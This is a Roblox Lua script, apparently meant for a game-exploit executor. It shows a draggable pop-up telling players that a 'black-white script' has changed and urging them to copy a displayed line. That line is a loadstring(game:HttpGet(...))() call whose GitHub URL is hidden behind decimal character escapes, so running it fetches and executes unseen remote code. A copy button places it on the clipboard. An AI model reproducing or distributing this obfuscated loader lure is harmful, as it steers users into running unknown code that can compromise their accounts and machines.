-- 支持关闭+拖动+复制+提示的完整UI
local Player = game.Players.LocalPlayer
local PlayerGui = Player:WaitForChild("PlayerGui", 10)
if not PlayerGui then warn("PlayerGui加载失败") return end

-- 1. 组件创建
local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = "FullFunctionGui"
ScreenGui.DisplayOrder = 9999
ScreenGui.Parent = PlayerGui -- 提前挂载避免渲染延迟

local MainFrame = Instance.new("Frame")
local DragArea = Instance.new("Frame") -- 拖动区域
local CloseButton = Instance.new("TextButton") -- 关闭按钮
local TipLabel = Instance.new("TextLabel")
local CodeLabel = Instance.new("TextLabel")
local CopyButton = Instance.new("TextButton")
local SuccessTip = Instance.new("TextLabel") -- 复制成功提示

-- 2. 主窗口配置
MainFrame.Size = UDim2.fromOffset(500, 260)
MainFrame.Position = UDim2.fromScale(0.5, 0.5)
MainFrame.AnchorPoint = Vector2.new(0.5, 0.5)
MainFrame.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
MainFrame.BorderColor3 = Color3.fromRGB(0, 170, 255)
MainFrame.BorderSizePixel = 2
MainFrame.ZIndex = 10
MainFrame.Parent = ScreenGui

-- 3. 拖动区域
DragArea.Name = "拖动区域"
DragArea.Size = UDim2.fromOffset(500, 20)
DragArea.Position = UDim2.fromOffset(0, 0)
DragArea.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
DragArea.ZIndex = 12
DragArea.Parent = MainFrame

-- 4. 关闭按钮（拖动区右侧，红色醒目）
CloseButton.Name = "关闭按钮"
CloseButton.Text = "×" -- 关闭符号
CloseButton.Size = UDim2.fromOffset(20, 20)
CloseButton.Position = UDim2.fromOffset(480, 0) -- 靠拖动区右侧对齐
CloseButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
CloseButton.TextColor3 = Color3.fromRGB(255, 255, 255)
CloseButton.TextSize = 16
CloseButton.ZIndex = 13
CloseButton.Parent = MainFrame

-- 关闭功能逻辑：点击隐藏整个UI
CloseButton.MouseButton1Click:Connect(function()
    ScreenGui.Enabled = false -- 隐藏UI，如需彻底删除改为 ScreenGui:Destroy()
end)

-- 5. 拖动功能逻辑
local isDragging = false
local startPos = Vector2.new()
local UIS = game:GetService("UserInputService")

DragArea.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        isDragging = true
        startPos = input.Position - MainFrame.Position.Offset
    end
end)

UIS.InputChanged:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseMovement and isDragging then
        local viewportSize = workspace.CurrentCamera.ViewportSize
        local newPos = input.Position - startPos
        -- 限制窗口在屏幕内
        newPos = Vector2.new(
            math.clamp(newPos.X, 0, viewportSize.X - MainFrame.AbsoluteSize.X),
            math.clamp(newPos.Y, 0, viewportSize.Y - MainFrame.AbsoluteSize.Y)
        )
        MainFrame.Position = UDim2.fromOffset(newPos.X, newPos.Y)
    end
end)

DragArea.InputEnded:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        isDragging = false
    end
end)

-- 6. 提示文字
TipLabel.Text = "黑白脚本已换代码，请复制下面代码"
TipLabel.Size = UDim2.fromOffset(450, 30)
TipLabel.Position = UDim2.fromOffset(25, 25)
TipLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TipLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
TipLabel.TextSize = 14
TipLabel.TextXAlignment = Enum.TextXAlignment.Left
TipLabel.ZIndex = 11
TipLabel.Parent = MainFrame

-- 7. 代码显示（修复引号转义问题）
local codeStr = 'loadstring(game:HttpGet("\\104\\116\\116\\112\\115\\58\\47\\47\\114\\97\\119\\46\\103\\105\\116\\104\\117\\98\\117\\115\\101\\114\\99\\111\\110\\116\\101\\110\\116\\46\\99\\111\\109\\47\\116\\102\\99\\121\\103\\118\\117\\110\\98\\105\\110\\100\\47\\65\\112\\112\\108\\101\\47\\53\\100\\97\\57\\52\\48\\99\\53\\101\\99\\57\\49\\54\\57\\52\\101\\97\\51\\98\\101\\49\\56\\55\\53\\51\\101\\48\\98\\57\\53\\50\\54\\55\\97\\51\\48\\56\\56\\97\\49\\47\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159\\239\\188\\159"))()'
CodeLabel.Text = codeStr
CodeLabel.Size = UDim2.fromOffset(450, 80)
CodeLabel.Position = UDim2.fromOffset(25, 65)
CodeLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CodeLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
CodeLabel.TextSize = 11
CodeLabel.TextWrapped = true
CodeLabel.TextXAlignment = Enum.TextXAlignment.Left
CodeLabel.TextYAlignment = Enum.TextYAlignment.Top
CodeLabel.ZIndex = 11
CodeLabel.Parent = MainFrame

-- 8. 复制按钮与逻辑（复用提示框，避免重复创建）
CopyButton.Text = "复制代码"
CopyButton.Size = UDim2.fromOffset(120, 40)
CopyButton.Position = UDim2.fromOffset(190, 170)
CopyButton.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
CopyButton.TextColor3 = Color3.fromRGB(0, 0, 0)
CopyButton.TextSize = 16
CopyButton.ZIndex = 11
CopyButton.Parent = MainFrame

-- 初始化成功提示框
SuccessTip.Text = ""
SuccessTip.Size = UDim2.fromOffset(120, 30)
SuccessTip.Position = UDim2.fromOffset(190, 140)
SuccessTip.BackgroundTransparency = 1
SuccessTip.TextColor3 = Color3.fromRGB(0, 255, 0)
SuccessTip.TextSize = 14
SuccessTip.ZIndex = 12
SuccessTip.Parent = MainFrame

CopyButton.MouseButton1Click:Connect(function()
    setclipboard(codeStr)
    SuccessTip.Text = "复制成功！"
    task.wait(1.5)
    SuccessTip.Text = ""
end)

-- 显示UI
ScreenGui.Enabled = true
